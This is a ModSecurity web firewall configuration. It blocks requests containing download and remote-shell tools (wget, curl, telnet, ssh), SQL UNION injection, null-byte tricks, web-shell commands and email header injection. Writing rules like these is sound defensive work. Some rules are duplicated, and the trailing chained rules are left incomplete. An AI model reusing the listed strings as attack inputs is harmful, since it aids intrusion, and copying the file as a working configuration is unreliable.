mod_security

SecFilterEngine On
SecFilterCheckURLEncoding On
SecServerSignature "LiteSpeed"
SecFilterCheckUnicodeEncoding Off
SecAuditEngine RelevantOnly
SecAuditLog logs/audit_log
SecFilterScanPOST On
SecFilterDefaultAction "deny,log,status:403"

# Require HTTP_USER_AGENT and HTTP_HOST in all requests
# SecFilterSelective "HTTP_USER_AGENT|HTTP_HOST" "^$"

# Require Content-Length to be provided with
# every POST request
SecFilterSelective REQUEST_METHOD "^POST$" chain
SecFilterSelective HTTP_Content-Length "^$"

# Don't accept transfer encodings we know we don't handle
# (and you don't need it anyway)
SecFilterSelective HTTP_Transfer-Encoding "!^$"

# Protecting from XSS attacks through the PHP session cookie
#SecFilterSelective ARG_PHPSESSID "!^[0-9a-z]*$"
#SecFilterSelective COOKIE_PHPSESSID "!^[0-9a-z]*$"

SecFilter "viewtopic\.php\?" chain
SecFilter "chr\(([0-9]{1,3})\)" "deny,log"

# Block various methods of downloading files to a server
SecFilterSelective THE_REQUEST "wget "
SecFilterSelective THE_REQUEST "lynx "
SecFilterSelective THE_REQUEST "scp "
SecFilterSelective THE_REQUEST "ftp "
SecFilterSelective THE_REQUEST "cvs "
SecFilterSelective THE_REQUEST "rcp "
SecFilterSelective THE_REQUEST "curl "
SecFilterSelective THE_REQUEST "telnet "
SecFilterSelective THE_REQUEST "ssh "
SecFilterSelective THE_REQUEST "echo "
SecFilterSelective THE_REQUEST "links -dump "
SecFilterSelective THE_REQUEST "links -dump-charset "
SecFilterSelective THE_REQUEST "links -dump-width "
SecFilterSelective THE_REQUEST "links http:// "
SecFilterSelective THE_REQUEST "links ftp:// "
SecFilterSelective THE_REQUEST "links -source "
SecFilterSelective THE_REQUEST "mkdir "
SecFilterSelective THE_REQUEST "cd /tmp "
SecFilterSelective THE_REQUEST "cd /var/tmp "
SecFilterSelective THE_REQUEST "cd /etc/httpd/proxy "
SecFilterSelective THE_REQUEST "/config.php?v=1&DIR "
SecFilterSelective THE_REQUEST "&highlight=%2527%252E "
SecFilterSelective THE_REQUEST "changedir=%2Ftmp%2F.php "
SecFilterSelective THE_REQUEST "arta\.zip "
SecFilterSelective THE_REQUEST "cmd=cd\x20/var "
SecFilterSelective THE_REQUEST "HCL_path=http "
SecFilterSelective THE_REQUEST "clamav-partial "
SecFilterSelective THE_REQUEST "vi\.recover "
SecFilterSelective THE_REQUEST "netenberg "
SecFilterSelective THE_REQUEST "%00.txt"
SecFilterSelective THE_REQUEST "fantastico_de_luxe "
SecFilter "%00.txt"
SecFilterSelective THE_REQUEST "%20UNION%20"
SecFilterSelective THE_REQUEST "/**/UNION/**/"
SecFilterSelective THE_REQUEST "%00"
SecFilterSelective THE_REQUEST "/**/union/**/"
#SecFilter "%20UNION%20"
#SecFilter "%20union%20"
#SecFilter "/**/UNION/**/"
SecFilter "%00"
SecFilterSelective THE_REQUEST "%00.txt"
SecFilterSelective THE_REQUEST "fantastico_de_luxe "
SecFilter "%00.txt"
SecFilterSelective THE_REQUEST "%00"
SecFilter "%00"
#SecRule REQUEST_BODY "@validateByteRange 1-255" \ 
#"log,deny,phase:2,t:none,msg:'ModSecurity ASCIIZ Evasion Attempt'"
#SecFilterSelective REQUEST_URI "act=f"
SecFilterSelective REQUEST_URI "act=chmod"
SecFilterSelective REQUEST_URI "act=ls"
#SecFilterSelective REQUEST_URI "act=search"
SecFilterSelective REQUEST_URI "act=tools"
SecFilterSelective REQUEST_URI "act=sql"
SecFilterSelective REQUEST_URI "act=security"
SecFilterSelective REQUEST_URI "act=fsbuff"
SecFilterSelective REQUEST_URI "!(/compose\.php\?)" chain
SecFilterSelective THE_REQUEST "Subject\:" chain
SecFilterSelective ARG_Bcc ".*\@"
SecFilterSelective REQUEST_URI "!(/compose\.php\?)" chain
SecFilterSelective POST_PAYLOAD "Subject\:" chain
SecFilterSelective POST_PAYLOAD "\s*bcc\:"
SecFilterSelective REQUEST_URI "!(/compose\.php\?)" chain
#SecFilterSelective POST_PAYLOAD "\s*bcc\:\s*[a-z0-9._%-]+@[A-Z0-9.-]+\.[a-z]{2,}"
SecFilterSelective REQUEST_URI "!(/compose\.php\?)" chain
#SecFilterSelective ARGS_VALUES "\n[[:space:]]*(to|b?cc)[[:space:]]*:.*@"
SecFilterSelective REQUEST_URI "!(/compose\.php\?)" chain
#SecFilterSelective ARGS_VALUES "\s*bcc\:\s*[a-z0-9._%-]+\@.*\.[a-z]{2,}"